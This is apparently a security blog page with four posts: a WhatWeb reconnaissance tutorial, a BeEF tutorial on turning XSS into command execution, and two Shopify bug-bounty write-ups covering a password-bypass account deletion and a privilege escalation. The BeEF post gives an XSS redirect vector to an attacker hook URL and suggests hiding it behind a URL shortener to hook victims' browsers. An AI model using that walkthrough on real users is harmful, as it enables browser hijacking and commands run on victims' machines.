WebApp Pentesting: Using WhatWeb

Hi Ck lovers

Today I am writing a post on information gathering for a website.Whatweb is a very interesting tool which can be used for information gathering.

What is WhatWeb ?

As the name suggests WhatWeb , It tell about What is the Website. WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.

How to Use this:-

WhatWeb comes preinstalled on major linux distributions like backbox and kali linux.

So to start using :-

1. Open Terminal and type WhatWeb it will show you a screen like this
   

2.Now to scan a website just simply type whatweb -website 

3. Now as soon you give the whatweb command it starts scanning the host. and after scanning it show a output like this 

There are many option in this tools which you can use for a vast variety of scanning to know all the option which is available just open terminal and type 
whatweb --help

it will show you all the available option for scanning.

More tutorials coming soon 
Stay tuned.


Thanks 
Jitendra Singh (Team Computer Korner)


Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!

Read more

Exploiting XSS for Full System Access: Beef Exploitation Framework

Hi,

Today we will discuss that how we can exploit XSS for full system access or for running command on a victim computer.

Their are two main types of XSS reflected and stored.

Stored XSS means where we can store XSS vector permanently on server such as in database or message forums. Then the malicious script is executed when user tries to retrieve the information.


Reflected XSS  are those where the injected script is reflected off the web server, such as in an error message, search result. Reflected attacks are delivered to victims via some other methods, such as in an e-mail message, or on some other web site. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a "trusted" server.

Lets start exploiting it.

In the exploitation we will use the a tools which comes is Major linux distribution know as BEEF exploitation framework.

If this tools is not currently installed on your system give this command in terminal to install it 

>>>sudo apt-get install beef

It will install it in seconds and then you are ready to exploiting the XSS.
Now start beef exploitation framework UI in your browser. You can easily type beef in your terminal to know where the UI is situated but if you can do this you have and alternate option beef framework always works on port no 3000 so just check your ip address with command 
>>> ifconfig

copy the ip address and visit this link 
Your_Ip_address:3000/ui/panel


Now it will take you to the login panel of beef framework it will look like this

Default Username:Password is beef:beef

Now login to this and it will take to to this page

here click where i located with small arrow mark 
it will take to the url like this 
Your_ip_add:3000/demos/butcher/index.html

copy this and create a XSS vector like this 
<script>window.location="YoUr_url"</script>

Now Store this XSS vector or if you are exploiting the reflected XSS then short the whole url using any url shorten service like bit.ly 


After storing the XSS or in reflected when user click the XSS vector link 
It will show you his ip address the many information about his browser and pc 
like this 

Now click on the command portion and you can run command on victim computer

Now you can do what you want 

Hope You enjoyed this post this post if you have any suggestion please let me know
fell free to comment


Thanks 
Jitendra K Singh and Sooraj Shekhar




Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!

Read more

Bypassing Password requirement during closing of account: Shopify Bug

Hi Ck lover

Today I am sharing how I bypassed the password requirement during closing of shop which have a trial account on Shopify.

Shopify requires password for closing of shop and once you closed the shop you have to buy a existing plan to reopen it.

So if you navigate to account > close shop it will ask for a password to close it.
after entering the password it takes a survey why I closed my shop after that survey the shop is deleted.
But after submitting the survey a plain request goes without password to delete the account.
There is not validation there.
the request looks like this 

POST /admin/account HTTP/1.1
Host: testingdeletion.myshopify.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://testingdeletion.myshopify.com/admin/settings/general
Cookie: <redacted>
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
utf8=%E2%9C%93&method=delete&authenticity_token=91xWjyZhsUKFB8k4oCTGjJxxRl25pwZNXdnNHXaYsLbj17tsg8NB%2BFnERHiG449IFxHN2vbV7L%2BUb7Cl3xxJow%3D%3D&cancelreason%5Bselection%5D=other&cancel_reason%5Bdetailed%5D=testing



You can see there is method=delete in this request but there is not validation of password here so i can grab a authenticity token by saving any of my account detail and capturing the request with burp then craft this request using you cookie and forward the request it will delete the account without any password requirement.

You can find more details here https://hackerone.com/reports/93901

This issue is now patched and they awarded my 500$ for reporting this issue


Thanks 
Jitendra K Singh (Team Computer-Korner)


Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!

Read more

How I made $500 from Shopify Story of a privilege escalation Bug

Hi dear Followers


Shopify launched their bug bounty program HackerOne 


This Post is about the bug on Shopify. This is a bug about privilege escalation of invited users any users who have full access to shop can also claim the accounts of invited users and can use it for spoofing against shop owner and the users who is invited there.
There are two options to invite a users 
1. First shop owner can invite them and the invited users will receive a link on their email address after clicking on the link users can create their account 
2. Shop owner can create the account on their behalf then provide them the email and password.
and one more thing only shop owner can invite users 

Now the second option can only be done by that person who is the shop owner.

Suppose there are three users A,B,C A is shop owner and B is a user that have the full access to the shop C is a user that is invited by A now B logs into his account navigate to Setting>general and invited users link the invited users C links looks like this

C- Invited

 Now click on invited and B can create account on the behalf of user C. After creating an account on behalf of C shop owner A setting will show him that the account has been claimed by users he invited which is C.

Now B can use C account for doing malicious things to shop and shop admin will think that this has been done by C. 

And this is privilege escalation for C and also for the shop owner because as I described before only shop owner can invite and create account on the behalf of invited users.

Now they fixed the bug that only Shop owner can access the user invited and joined tab on their shopify account

Shopify awarded me a bounty of $500 for reporting this bug.

Hope you enjoyed this post 

Feel free to comment and question are welcome

Thanks 

Jitendra K Singh and Whole Computer Korner and I-HOS team.

Feel Free To Leave A Comment If Our Article has Helped You, Support Us By Making A Small Contribution, Thank You!

Read more